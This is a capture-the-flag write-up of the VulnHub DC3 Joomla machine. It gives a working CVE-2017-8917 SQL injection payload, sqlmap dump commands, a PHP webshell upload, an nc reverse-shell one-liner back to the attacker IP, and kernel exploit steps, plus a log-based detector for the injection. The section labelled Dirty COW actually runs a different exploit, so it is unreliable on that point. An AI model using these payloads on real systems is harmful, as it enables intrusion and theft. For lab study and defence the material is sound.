[VulnHub] DC3 Penetration Test Notes
2022-5-18 22:7:21 Author: www.freebuf.com

Target information

Kali: 192.168.123.73
Target: 192.168.123.144

Information gathering

Gather information with nmap

[image: https://i.imgtg.com/2022/03/31/b3KYX.png]

Port 80 is found open.

Visit port 80

[image: https://i.imgtg.com/2022/03/31/b3v5t.png]
Wappalyzer identifies the CMS as Joomla.

Joomla scanner

By analogy with DC2, there should also be a dedicated scanner for Joomla.

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl

Seeing this page means joomscan was downloaded correctly.

[image: https://i.imgtg.com/2022/03/31/b3yKx.png]

Scan the DC3 site with joomscan; it returns the following.

Directory listing

[image: https://i.imgtg.com/2022/03/31/b3gSj.png]

Admin backend

[image: https://i.imgtg.com/2022/03/31/b3mwp.png]

Joomla version information

[image: https://i.imgtg.com/2022/03/31/b3J1U.png]

Exploitation

SQL injection vulnerability

A Baidu search turns up the SQL injection vulnerability in Joomla 3.7.0 (CVE-2017-8917).

Payload: http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

Look it up in the local exploit-db copy:

searchsploit joomla 3.7.0

[image: https://i.imgtg.com/2022/03/31/b3PDY.png]

View the corresponding exploit entry:

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

[image: https://i.imgtg.com/2022/03/31/b3R8v.png]

Enumerate databases:

sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

[image: https://i.imgtg.com/2022/03/31/b34xq.png]

The databases information_schema, joomladb, mysql and others are present.

Injection types found: blind, error-based and time-based.

Enumerate tables:

sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' --tables -p list[fullordering]

[image: https://i.imgtg.com/2022/03/31/b3Dpc.png]

[image: https://i.imgtg.com/2022/03/31/b3Hfr.png]

Enumerate columns

[image: https://i.imgtg.com/2022/03/31/b3EBM.png]

Try to dump the contents of the username and password columns (the dump option is --dump, with two dashes):

sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump -p list[fullordering]

[image: https://i.imgtg.com/2022/03/31/b3GKG.png]
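From the defender's side, the same parameter gives a simple detection rule: a legitimate list[fullordering] value is only ever a column name plus ASC/DESC, so anything else sent to com_fields is a CVE-2017-8917 probe. The checker below is an added example, not part of the original writeup; the Apache access-log lines, IPs and user agents in it are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample Apache access-log lines (not taken from the original writeup).
# Lines 1-2 mimic CVE-2017-8917 probes against list[fullordering]; lines 3-4 are benign.
SAMPLE_LOG = """\
192.168.123.73 - - [31/Mar/2022:10:01:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 500 1234 "-" "Mozilla/5.0"
192.168.123.73 - - [31/Mar/2022:10:01:03 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=extractvalue%280x0a%2Cconcat%280x0a%2Cversion%28%29%29%29 HTTP/1.1" 500 1234 "-" "sqlmap/1.6"
192.168.123.50 - - [31/Mar/2022:10:02:00 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.id+ASC HTTP/1.1" 200 4567 "-" "Mozilla/5.0"
192.168.123.50 - - [31/Mar/2022:10:03:00 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8910 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# The only legitimate shape of list[fullordering] is "<column> ASC|DESC"; Joomla 3.7.0
# concatenated anything else straight into the ORDER BY clause.
LEGIT_ORDER_RE = re.compile(r'^[A-Za-z0-9_.]+\s+(ASC|DESC)$', re.IGNORECASE)
# Functions that appear in the error-based / time-based payloads used by the PoC and sqlmap.
SQLI_MARKERS = ('updatexml', 'extractvalue', 'concat(', 'sleep(', 'benchmark(', 'select ')

def check_line(line):
    """Return a finding dict if the line is a com_fields request with a tampered
    list[fullordering] value, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status, ua = m.groups()
    parts = urlsplit(target)
    if parts.path != '/index.php':
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # also decodes %5B/%5D in the key
    if qs.get('option') != ['com_fields']:
        return None
    for raw in qs.get('list[fullordering]', []):
        val = unquote_plus(raw)  # second decode pass catches double-encoded payloads
        if LEGIT_ORDER_RE.match(val.strip()):
            continue
        low = val.lower()
        return {'src': src, 'time': ts, 'method': method, 'status': status, 'ua': ua,
                'value': val, 'markers': [k for k in SQLI_MARKERS if k in low]}
    return None

def scan_log(text):
    """Run check_line over every line of an access log and collect the findings."""
    return [f for f in (check_line(l) for l in text.splitlines()) if f]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} status={f['status']} ua={f['ua']} markers={f['markers']}")
```

The HTTP 500 status on the probe lines is itself a useful secondary signal, since the error-based payloads deliberately make MySQL raise an error.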

john (password cracking)

Save the hashed password to a text file.

john command options

--single: single-crack mode, cracking with the rules from the configuration file

--wordlist=FILE / --stdin: wordlist mode, reading candidate words from FILE or standard input

--show: show cracked passwords

[image: https://i.imgtg.com/2022/03/31/b3Q01.png]

[image: https://i.imgtg.com/2022/03/31/b3SwI.png]

Webshell upload

The site's Templates section allows writing and uploading files, and the directory listing found earlier lets us view them. Try writing a one-line webshell there.

[image: https://i.imgtg.com/2022/03/31/b3c1D.png]

[image: https://i.imgtg.com/2022/03/31/b3dHF.png]

Use New File to create a new file under html.

[image: https://i.imgtg.com/2022/03/31/b3s86.png]

Write the file, then view chen.php through the directory listing found earlier.

[image: https://i.imgtg.com/2022/03/31/b3YxP.png]

Connect with AntSword

[image: https://i.imgtg.com/2022/03/31/b3fJb.png]

For convenience, listen on a port on the attacker machine and use AntSword to spawn a reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.123.73 8888 >/tmp/f

[image: https://i.imgtg.com/2022/03/31/b3lfl.png]

Dirty COW privilege escalation

The exploit file no longer works, so go over the principle and the steps once.

Impact: a low-privileged user can use the vulnerability to escalate privileges locally.

Principle: the Linux kernel's memory subsystem has a race condition in its handling of copy-on-write; a malicious user can exploit it to gain write access to read-only memory mappings and thereby obtain high privileges.

Race condition: an abnormal ordering of concurrent operations that can crash the application or let an attacker execute commands and escalate privileges on the target machine.

Kernel privilege escalation: find a vulnerability matching the server, obtain the exploit file, and run it.

Determine the server version

[image: https://i.imgtg.com/2022/03/31/b3jBg.png]

The Ubuntu version is 16.04.

searchsploit ubuntu 16.04

[image: https://i.imgtg.com/2022/03/31/b32ZB.png]

[image: https://i.imgtg.com/2022/03/31/b360s.png]

tar -xvf exploit.tar  # extract the archive

cd ebpf_mapfd_doubleput_exploit/  # enter the directory

chmod +x compile.sh  # make the script executable

./compile.sh  # run the build script

./doubleput  # run the privilege-escalation exploit

Wait for the root shell.

Summary

Dirty COW privilege escalation and different ways of getting a reverse shell.

[image: https://i.imgtg.com/2022/03/31/b3XMK.png]

Links

Reverse shell

Source: https://www.freebuf.com/articles/web/326933.html